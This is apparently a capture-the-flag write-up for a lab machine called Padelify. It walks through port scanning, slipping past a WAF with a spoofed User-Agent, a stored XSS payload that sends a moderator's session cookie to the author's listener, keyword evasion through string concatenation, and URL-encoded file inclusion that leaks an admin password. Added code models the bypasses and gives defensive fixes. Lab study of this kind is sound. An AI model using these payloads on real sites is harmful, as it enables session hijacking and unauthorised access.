# Padelify

* Ran a TCP scan using Nmap on the target and found two open ports, i.e. 22 (SSH) and 80 (HTTP).

```
nmap -sC -sV -p 22,80 10.48.132.157
```

```
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.14 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.58 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.58 (Ubuntu)
|_http-title: Padelify - Tournament Registration
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.33 seconds

```

* The `http-cookie-flags` script also reports that `PHPSESSID` is set without the `HttpOnly` flag, which matters later: a cookie without `HttpOnly` can be read by JavaScript.
* Next, the webpage on port 80 showed the following

<figure><img src="https://697415701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGOxHHc65JQOToz8nkPKh%2Fuploads%2Ff0DxuU5q74v2uxYEMOuP%2Fimage.png?alt=media&#x26;token=3523efcf-a9b4-4219-812f-959055cbce7a" alt=""><figcaption></figcaption></figure>

* Next, I tried to run a directory scan with Gobuster, but the WAF was blocking the requests with a 403 Forbidden error.
* I manually set a browser-like User-Agent in Gobuster (`-a`) and the directory scan then ran successfully.

```
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.48.132.157 -a "Mozilla/5.0 (Linux; Android 12; PSD-AL00 Build/HUAWEIPSD-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/99.0.4844.88 Mobile Safari/537.36"
```

* You can use any User-Agent that mimics a legitimate browser to get past the WAF; it was evidently keying on Gobuster's default User-Agent string.
* I found the following directories in the scan.

<figure><img src="https://697415701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGOxHHc65JQOToz8nkPKh%2Fuploads%2FRyhXJcQ5keAp3I6Qhe1j%2Fimage.png?alt=media&#x26;token=7a01a161-f7c9-4a51-9248-7645a70d742d" alt=""><figcaption></figcaption></figure>

* `/logs` and `/config` seemed interesting.
* `/config` contained an `app.conf` file, but the WAF blocked me from opening it.
* `/logs` was a directory listing containing a file `error.log`

<figure><img src="https://697415701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGOxHHc65JQOToz8nkPKh%2Fuploads%2FK76dx72NqZQIaKiAcNUS%2Fimage.png?alt=media&#x26;token=e4d7ec1d-d21c-4c12-a315-b6319e1b595b" alt=""><figcaption></figcaption></figure>

* The `error.log` file had the following contents.

<figure><img src="https://697415701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGOxHHc65JQOToz8nkPKh%2Fuploads%2Fakqk8o9YOMsbKC1ILgfn%2Fimage.png?alt=media&#x26;token=e9d4425f-bf60-4077-8773-32e85fc49ac2" alt=""><figcaption></figcaption></figure>

* The error log shows that an XSS attempt had been made against the site before. That suggests the site may be vulnerable to XSS and that, with the right payload, it can be exploited despite the WAF.
* I went to the login page and tried XSS payloads.
* The page clearly stated that a moderator would approve our registration, so a payload stored through the registration form should run in the moderator's browser; stealing the moderator's session cookie would give us elevated access.
* I first started an HTTP server on my attacker machine on port 8000.

```
python3 -m http.server 8000
```

* Next, I used the following payload to check XSS.

```
<img src='http://10.48.79.213:8000/burp.json'>
```

* I had a `burp.json` file in my working directory, so when the moderator's browser rendered the stored payload, the `<img>` tag would issue a GET request for that file to my HTTP server. This was only to confirm the XSS (and that the moderator really views the submission); no cookie is exfiltrated yet.

<figure><img src="https://697415701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGOxHHc65JQOToz8nkPKh%2Fuploads%2FtRQlH13lkTU3YR69hMMa%2Fimage.png?alt=media&#x26;token=c0467f7a-0d4b-4812-b5a3-ed4225982b45" alt=""><figcaption></figcaption></figure>

* After that, I tried several different payloads to steal the moderator's cookies and found that:
  * `<script>` tags are blocked
  * the word `cookie` is specifically blocked
  * `<img>` tags with an `onload` or `onerror` attribute didn't work
* I also tried HTML entity encoding the payloads, but the WAF detected those too.
* Next, I tried an `<iframe>` tag with an `onload` attribute.

```
<iframe onload="new Image().src='http://10.48.79.213:1234?x='+document['coo'+'kie']">
```

* I used `document['coo'+'kie']` specifically to evade the WAF's block on the term `cookie`: bracket access with a concatenated key resolves to the same `document.cookie` property at runtime, but the submitted text never contains the blocked word. The payload above was injected to run in the moderator's browser and send the cookies to a listener on port 1234 on my machine.
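As an added example (not code from the original write-up), the snippet below models the keyword blocklist described above, shows why the concatenated-key payload passes it while still resolving to `document.cookie`, and parses the request line a listener receives. The blocklist regexes and the sample request line are constructed approximations of what the write-up describes, and `document` is emulated with a plain object because this runs under Node rather than in a browser:

```javascript
// Added example, not from the original write-up: a model of the keyword
// blocklist the WAF applied, the iframe payload that slips past it, and the
// listener-side parse of the exfiltrated cookie.

// Constructed approximation of the rules observed in the write-up: <script>
// tags, the literal word "cookie", and <img> with onload/onerror.
// Assumption: case-insensitive regex matching on the submitted text.
const BLOCKED = [
  /<script/i,
  /cookie/i,
  /<img[^>]*\son(load|error)\s*=/i,
];

function wafBlocks(payload) {
  return BLOCKED.some(re => re.test(payload));
}

// The payload from the write-up, parameterised by the listener address.
// document['coo'+'kie'] is the same property as document.cookie, but the
// submitted text never contains the blocked word.
function buildPayload(host, port) {
  return `<iframe onload="new Image().src='http://${host}:${port}?x='+document['coo'+'kie']">`;
}

// What the moderator's browser evaluates. `doc` stands in for `document`
// here because this runs under Node, not in a browser.
function readCookieViaConcat(doc) {
  return doc['coo' + 'kie'];
}

// Listener side: the cookie arrives as the x= query parameter of a GET.
// Parse the request line a netcat-style listener prints, e.g.
//   GET /?x=PHPSESSID%3Dabc123 HTTP/1.1
function extractExfil(requestLine) {
  const m = requestLine.match(/^GET\s+(\S+)/);
  if (!m) return null;
  const url = new URL(m[1], 'http://listener.invalid');
  return url.searchParams.get('x'); // percent-decoded, or null if absent
}

// Demo with constructed data
const payload = buildPayload('10.48.79.213', 1234);
console.log('bypass payload blocked by WAF model?', wafBlocks(payload));
console.log('naive payload blocked?',
  wafBlocks('<img src=x onerror="fetch(\'//a/?c=\'+document.cookie)">'));
console.log('browser evaluates to:', readCookieViaConcat({ cookie: 'PHPSESSID=abc123' }));
console.log('listener parsed:', extractExfil('GET /?x=PHPSESSID%3Dabc123 HTTP/1.1'));
```

Run it with `node`. The defensive takeaway is that a substring blocklist on `cookie` cannot cover the ways JavaScript lets you compute a property name (`document['coo'+'kie']`, `document[atob('Y29va2ll')]`, `String.fromCharCode`), whereas setting the `HttpOnly` flag on `PHPSESSID` (which the Nmap output shows is missing) keeps the cookie out of reach of every one of them.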

<figure><img src="https://697415701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGOxHHc65JQOToz8nkPKh%2Fuploads%2FDQgZbkrAriedGl6ACrcm%2Fimage.png?alt=media&#x26;token=a072c121-c8d9-4abc-b37b-86d43021344e" alt=""><figcaption></figcaption></figure>

* As you can see, I successfully stole the moderator's cookies using XSS, which I could use to elevate my privileges.
* You can use several different variations of the XSS payload above. In some write-ups you will see a `<body>` tag with `onload` used instead of `<iframe>`.
* Now, I went to the Storage tab in the browser's developer tools and replaced my own session cookie with the moderator's.

<figure><img src="https://697415701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGOxHHc65JQOToz8nkPKh%2Fuploads%2FgKlGr8XBHzX5kOSEWL1w%2Fimage.png?alt=media&#x26;token=6e23bf31-8b51-458f-8e5c-c92a17c04e7b" alt=""><figcaption></figcaption></figure>

* Upon doing so, I was redirected to the dashboard and received the first flag.

<figure><img src="https://697415701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGOxHHc65JQOToz8nkPKh%2Fuploads%2FiwB7jA8AgMycXG32loSh%2Fimage.png?alt=media&#x26;token=89aa7290-55a8-47be-9e18-a769d7f3cb34" alt=""><figcaption></figcaption></figure>

## Admin Flag

* I clicked on the Live option on the navigation bar from the dashboard.

<figure><img src="https://697415701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGOxHHc65JQOToz8nkPKh%2Fuploads%2FiQQh45rzyGChPQxzKeW7%2Fimage.png?alt=media&#x26;token=4a25d732-da18-492b-846b-806bf614dea6" alt=""><figcaption></figcaption></figure>

* The link had a GET parameter `page` with the value `match.php`. A parameter that names a file for the server to load is a classic sign of Local File Inclusion (LFI), so I tried that next.
* I used the very generic `/etc/passwd` payload first, but the WAF flagged it.
* Next, I recalled the `app.conf` file inside the `config` folder that I couldn't open because of the WAF.
* I tried `/config/app.conf` in the GET parameter and was again blocked by the WAF.
* Then I URL-encoded the value in Burp Suite as follows.

<figure><img src="https://697415701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGOxHHc65JQOToz8nkPKh%2Fuploads%2FhhrgpzotWFuERcCXzmvv%2Fimage.png?alt=media&#x26;token=ebbfe672-346b-4259-917a-5cabca5e4abc" alt=""><figcaption></figcaption></figure>

* I converted `/config/app.conf` to its fully URL-encoded form (every character percent-encoded) and sent the request, which returned the following.
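As an added example, not part of the original write-up, the following shows the full percent-encoding that got the `page` value past the WAF and why it works: the blocklist is modelled as a substring match on the raw, undecoded query string (an assumption about this WAF's behaviour), which the encoded form never matches, while PHP decodes the value before it reaches the include. A normalising check that decodes before matching is shown alongside it; the blocklist entries are constructed from the two paths the write-up says were refused:

```javascript
// Added example, not from the original write-up: full URL-encoding of the
// `page` value versus a substring-matching WAF, plus a hardened check.

// Percent-encode every byte, as Burp's "URL-encode all characters" does.
// encodeURIComponent() alone leaves letters, digits and '.' visible, so
// "/config/app.conf" would still contain the blocked substring.
function fullUrlEncode(s) {
  return Array.from(Buffer.from(s, 'utf8'),
    b => '%' + b.toString(16).toUpperCase().padStart(2, '0')).join('');
}

// Constructed stand-in for the WAF rules that rejected the raw values in the
// write-up. Assumption: the real WAF compared the raw, undecoded query string.
const BLOCKED_PATHS = ['/etc/passwd', '/config/app.conf'];

function naiveWaf(rawValue) {
  return BLOCKED_PATHS.some(p => rawValue.includes(p));
}

// What PHP sees in $_GET['page']: the query string is percent-decoded once
// before the script runs, so include() receives the original path.
function serverSeesPage(rawValue) {
  return decodeURIComponent(rawValue);
}

// Hardened check: decode repeatedly (bounded, to also catch double encoding),
// then normalise separators before matching the same blocklist.
function normalisingWaf(rawValue) {
  let v = rawValue;
  for (let i = 0; i < 3; i++) {
    let d;
    try { d = decodeURIComponent(v); } catch (e) { break; } // malformed %xx
    if (d === v) break;
    v = d;
  }
  v = v.replace(/\\/g, '/').replace(/\/+/g, '/');
  return BLOCKED_PATHS.some(p => v.includes(p));
}

// Demo with the path from the write-up
const target = '/config/app.conf';
const encoded = fullUrlEncode(target);
console.log('raw value      :', target, '| naiveWaf blocks:', naiveWaf(target));
console.log('encoded value  :', encoded, '| naiveWaf blocks:', naiveWaf(encoded));
console.log('server decodes :', serverSeesPage(encoded));
console.log('normalisingWaf :', normalisingWaf(encoded));
```

The fix on the defender's side is the one `normalisingWaf` shows: decode and canonicalise before matching, or better, stop using a blocklist at all and have the application resolve `page` against an allowlist of known files.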

<figure><img src="https://697415701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGOxHHc65JQOToz8nkPKh%2Fuploads%2FUA9Fs2Y7rq9FOmlbWjCU%2Fimage.png?alt=media&#x26;token=5adc0025-0810-423a-a4f9-e979d35aeb2e" alt=""><figcaption></figcaption></figure>

* Here you can see `admin_info = "bL}8,S9W1o44"`, which turned out to be the admin password.
* I went to `/login.php` and logged in with the credentials `admin:bL}8,S9W1o44`

<figure><img src="https://697415701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGOxHHc65JQOToz8nkPKh%2Fuploads%2FZrdgtZGgPXfLmA2zrQBt%2Fimage.png?alt=media&#x26;token=eac739f5-8db8-42ff-bd5d-4cb9aaf27af0" alt=""><figcaption></figcaption></figure>

* And as you can see, we successfully elevated to the admin dashboard and got the admin flag.
